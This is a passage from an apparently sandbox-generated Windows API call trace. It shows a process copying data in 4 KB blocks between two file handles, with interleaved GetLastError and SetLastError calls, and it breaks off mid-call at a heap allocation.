lpOverlapped=0x0) returned 1 [0078.180] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.180] GetLastError () returned 0x0 [0078.180] SetLastError (dwErrCode=0x0) [0078.180] GetLastError () returned 0x0 [0078.180] SetLastError (dwErrCode=0x0) [0078.180] GetLastError () returned 0x0 [0078.180] SetLastError (dwErrCode=0x0) [0078.180] GetLastError () returned 0x0 [0078.180] SetLastError (dwErrCode=0x0) [0078.180] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.180] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.180] GetLastError () returned 0x0 [0078.180] SetLastError (dwErrCode=0x0) [0078.180] GetLastError () returned 0x0 [0078.180] SetLastError (dwErrCode=0x0) [0078.180] GetLastError () returned 0x0 [0078.180] SetLastError (dwErrCode=0x0) [0078.181] GetLastError () returned 0x0 [0078.181] SetLastError (dwErrCode=0x0) [0078.181] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.181] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.181] GetLastError () returned 0x0 [0078.181] SetLastError (dwErrCode=0x0) [0078.181] GetLastError () returned 0x0 [0078.181] SetLastError (dwErrCode=0x0) [0078.181] GetLastError () returned 0x0 [0078.181] SetLastError (dwErrCode=0x0) [0078.181] GetLastError () returned 0x0 [0078.181] SetLastError (dwErrCode=0x0) [0078.181] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.181] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.182] GetLastError () returned 0x0 [0078.182] SetLastError (dwErrCode=0x0) [0078.182] GetLastError () returned 0x0 [0078.182] SetLastError (dwErrCode=0x0) [0078.182] GetLastError () returned 0x0 [0078.182] SetLastError (dwErrCode=0x0) [0078.182] GetLastError () returned 0x0 [0078.182] SetLastError (dwErrCode=0x0) [0078.182] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.182] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.182] GetLastError () returned 0x0 [0078.182] SetLastError (dwErrCode=0x0) [0078.182] GetLastError () returned 0x0 [0078.182] SetLastError (dwErrCode=0x0) [0078.182] GetLastError () returned 0x0 [0078.182] SetLastError (dwErrCode=0x0) [0078.182] GetLastError () returned 0x0 [0078.182] SetLastError (dwErrCode=0x0) [0078.182] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.182] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.183] GetLastError () returned 0x0 [0078.183] SetLastError (dwErrCode=0x0) [0078.183] GetLastError () returned 0x0 [0078.183] SetLastError (dwErrCode=0x0) [0078.183] GetLastError () returned 0x0 [0078.183] SetLastError (dwErrCode=0x0) [0078.183] GetLastError () returned 0x0 [0078.183] SetLastError (dwErrCode=0x0) [0078.183] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.183] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.183] GetLastError () returned 0x0 [0078.183] SetLastError (dwErrCode=0x0) [0078.183] GetLastError () returned 0x0 [0078.183] SetLastError (dwErrCode=0x0) [0078.183] GetLastError () returned 0x0 [0078.183] SetLastError (dwErrCode=0x0) [0078.183] GetLastError () returned 0x0 [0078.183] SetLastError (dwErrCode=0x0) [0078.183] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.184] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.184] GetLastError () returned 0x0 [0078.184] SetLastError (dwErrCode=0x0) [0078.184] GetLastError () returned 0x0 [0078.184] SetLastError (dwErrCode=0x0) [0078.184] GetLastError () returned 0x0 [0078.184] SetLastError (dwErrCode=0x0) [0078.184] GetLastError () returned 0x0 [0078.184] SetLastError (dwErrCode=0x0) [0078.184] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.184] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.184] GetLastError () returned 0x0 [0078.184] SetLastError (dwErrCode=0x0) [0078.184] GetLastError () returned 0x0 [0078.184] SetLastError (dwErrCode=0x0) [0078.184] GetLastError () returned 0x0 [0078.184] SetLastError (dwErrCode=0x0) [0078.184] GetLastError () returned 0x0 [0078.184] SetLastError (dwErrCode=0x0) [0078.184] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.185] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.185] GetLastError () returned 0x0 [0078.185] SetLastError (dwErrCode=0x0) [0078.185] GetLastError () returned 0x0 [0078.185] SetLastError (dwErrCode=0x0) [0078.185] GetLastError () returned 0x0 [0078.185] SetLastError (dwErrCode=0x0) [0078.185] GetLastError () returned 0x0 [0078.185] SetLastError (dwErrCode=0x0) [0078.185] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.185] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.185] GetLastError () returned 0x0 [0078.185] SetLastError (dwErrCode=0x0) [0078.185] GetLastError () returned 0x0 [0078.185] SetLastError (dwErrCode=0x0) [0078.185] GetLastError () returned 0x0 [0078.185] SetLastError (dwErrCode=0x0) [0078.185] GetLastError () returned 0x0 [0078.185] SetLastError (dwErrCode=0x0) [0078.186] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.186] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.186] GetLastError () returned 0x0 [0078.186] SetLastError (dwErrCode=0x0) [0078.186] GetLastError () returned 0x0 [0078.186] SetLastError (dwErrCode=0x0) [0078.186] GetLastError () returned 0x0 [0078.186] SetLastError (dwErrCode=0x0) [0078.186] GetLastError () returned 0x0 [0078.186] SetLastError (dwErrCode=0x0) [0078.186] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.186] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.186] GetLastError () returned 0x0 [0078.186] SetLastError (dwErrCode=0x0) [0078.186] GetLastError () returned 0x0 [0078.186] SetLastError (dwErrCode=0x0) [0078.186] GetLastError () returned 0x0 [0078.186] SetLastError (dwErrCode=0x0) [0078.186] GetLastError () returned 0x0 [0078.187] SetLastError (dwErrCode=0x0) [0078.187] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.187] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.187] GetLastError () returned 0x0 [0078.187] SetLastError (dwErrCode=0x0) [0078.187] GetLastError () returned 0x0 [0078.187] SetLastError (dwErrCode=0x0) [0078.187] GetLastError () returned 0x0 [0078.187] SetLastError (dwErrCode=0x0) [0078.187] GetLastError () returned 0x0 [0078.187] SetLastError (dwErrCode=0x0) [0078.187] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.187] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.187] GetLastError () returned 0x0 [0078.187] SetLastError (dwErrCode=0x0) [0078.187] GetLastError () returned 0x0 [0078.188] SetLastError (dwErrCode=0x0) [0078.188] GetLastError () returned 0x0 [0078.188] SetLastError (dwErrCode=0x0) [0078.188] GetLastError () returned 0x0 [0078.188] SetLastError (dwErrCode=0x0) [0078.188] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.188] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.188] GetLastError () returned 0x0 [0078.188] SetLastError (dwErrCode=0x0) [0078.188] GetLastError () returned 0x0 [0078.188] SetLastError (dwErrCode=0x0) [0078.188] GetLastError () returned 0x0 [0078.188] SetLastError (dwErrCode=0x0) [0078.188] GetLastError () returned 0x0 [0078.188] SetLastError (dwErrCode=0x0) [0078.188] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.188] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.188] GetLastError () returned 0x0 [0078.189] SetLastError (dwErrCode=0x0) [0078.189] GetLastError () returned 0x0 [0078.189] SetLastError (dwErrCode=0x0) [0078.189] GetLastError () returned 0x0 [0078.189] SetLastError (dwErrCode=0x0) [0078.189] GetLastError () returned 0x0 [0078.189] SetLastError (dwErrCode=0x0) [0078.189] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.189] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.189] GetLastError () returned 0x0 [0078.189] SetLastError (dwErrCode=0x0) [0078.189] GetLastError () returned 0x0 [0078.189] SetLastError (dwErrCode=0x0) [0078.189] GetLastError () returned 0x0 [0078.189] SetLastError (dwErrCode=0x0) [0078.189] GetLastError () returned 0x0 [0078.189] SetLastError (dwErrCode=0x0) [0078.189] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.189] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.190] GetLastError () returned 0x0 [0078.190] SetLastError (dwErrCode=0x0) [0078.190] GetLastError () returned 0x0 [0078.190] SetLastError (dwErrCode=0x0) [0078.190] GetLastError () returned 0x0 [0078.190] SetLastError (dwErrCode=0x0) [0078.190] GetLastError () returned 0x0 [0078.190] SetLastError (dwErrCode=0x0) [0078.190] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.190] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.190] GetLastError () returned 0x0 [0078.190] SetLastError (dwErrCode=0x0) [0078.190] GetLastError () returned 0x0 [0078.190] SetLastError (dwErrCode=0x0) [0078.190] GetLastError () returned 0x0 [0078.190] SetLastError (dwErrCode=0x0) [0078.190] GetLastError () returned 0x0 [0078.190] SetLastError (dwErrCode=0x0) [0078.190] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.190] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.191] GetLastError () returned 0x0 [0078.191] SetLastError (dwErrCode=0x0) [0078.191] GetLastError () returned 0x0 [0078.191] SetLastError (dwErrCode=0x0) [0078.191] GetLastError () returned 0x0 [0078.191] SetLastError (dwErrCode=0x0) [0078.191] GetLastError () returned 0x0 [0078.191] SetLastError (dwErrCode=0x0) [0078.191] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.191] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.191] GetLastError () returned 0x0 [0078.191] SetLastError (dwErrCode=0x0) [0078.191] GetLastError () returned 0x0 [0078.191] SetLastError (dwErrCode=0x0) [0078.191] GetLastError () returned 0x0 [0078.191] SetLastError (dwErrCode=0x0) [0078.191] GetLastError () returned 0x0 [0078.191] SetLastError (dwErrCode=0x0) [0078.191] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.191] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.192] GetLastError () returned 0x0 [0078.192] SetLastError (dwErrCode=0x0) [0078.192] GetLastError () returned 0x0 [0078.192] SetLastError (dwErrCode=0x0) [0078.192] GetLastError () returned 0x0 [0078.192] SetLastError (dwErrCode=0x0) [0078.192] GetLastError () returned 0x0 [0078.192] SetLastError (dwErrCode=0x0) [0078.192] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.192] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.192] GetLastError () returned 0x0 [0078.192] SetLastError (dwErrCode=0x0) [0078.192] GetLastError () returned 0x0 [0078.192] SetLastError (dwErrCode=0x0) [0078.192] GetLastError () returned 0x0 [0078.192] SetLastError (dwErrCode=0x0) [0078.192] GetLastError () returned 0x0 [0078.192] SetLastError (dwErrCode=0x0) [0078.192] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.192] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.193] GetLastError () returned 0x0 [0078.193] SetLastError (dwErrCode=0x0) [0078.193] GetLastError () returned 0x0 [0078.193] SetLastError (dwErrCode=0x0) [0078.193] GetLastError () returned 0x0 [0078.193] SetLastError (dwErrCode=0x0) [0078.193] GetLastError () returned 0x0 [0078.193] SetLastError (dwErrCode=0x0) [0078.193] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.193] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.193] GetLastError () returned 0x0 [0078.193] SetLastError (dwErrCode=0x0) [0078.193] GetLastError () returned 0x0 [0078.193] SetLastError (dwErrCode=0x0) [0078.193] GetLastError () returned 0x0 [0078.193] SetLastError (dwErrCode=0x0) [0078.193] GetLastError () returned 0x0 [0078.193] SetLastError (dwErrCode=0x0) [0078.193] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.193] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.194] GetLastError () returned 0x0 [0078.194] SetLastError (dwErrCode=0x0) [0078.194] GetLastError () returned 0x0 [0078.194] SetLastError (dwErrCode=0x0) [0078.194] GetLastError () returned 0x0 [0078.194] SetLastError (dwErrCode=0x0) [0078.194] GetLastError () returned 0x0 [0078.194] SetLastError (dwErrCode=0x0) [0078.194] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.194] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.194] GetLastError () returned 0x0 [0078.194] SetLastError (dwErrCode=0x0) [0078.194] GetLastError () returned 0x0 [0078.194] SetLastError (dwErrCode=0x0) [0078.194] GetLastError () returned 0x0 [0078.194] SetLastError (dwErrCode=0x0) [0078.194] GetLastError () returned 0x0 [0078.194] SetLastError (dwErrCode=0x0) [0078.194] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.194] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.195] GetLastError () returned 0x0 [0078.195] SetLastError (dwErrCode=0x0) [0078.195] GetLastError () returned 0x0 [0078.195] SetLastError (dwErrCode=0x0) [0078.195] GetLastError () returned 0x0 [0078.195] SetLastError (dwErrCode=0x0) [0078.195] GetLastError () returned 0x0 [0078.195] SetLastError (dwErrCode=0x0) [0078.195] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.195] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.195] GetLastError () returned 0x0 [0078.195] SetLastError (dwErrCode=0x0) [0078.195] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.195] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.196] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.196] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.196] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0078.196] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.197] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x6ae, lpOverlapped=0x0) returned 1 [0078.197] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0078.197] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0078.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 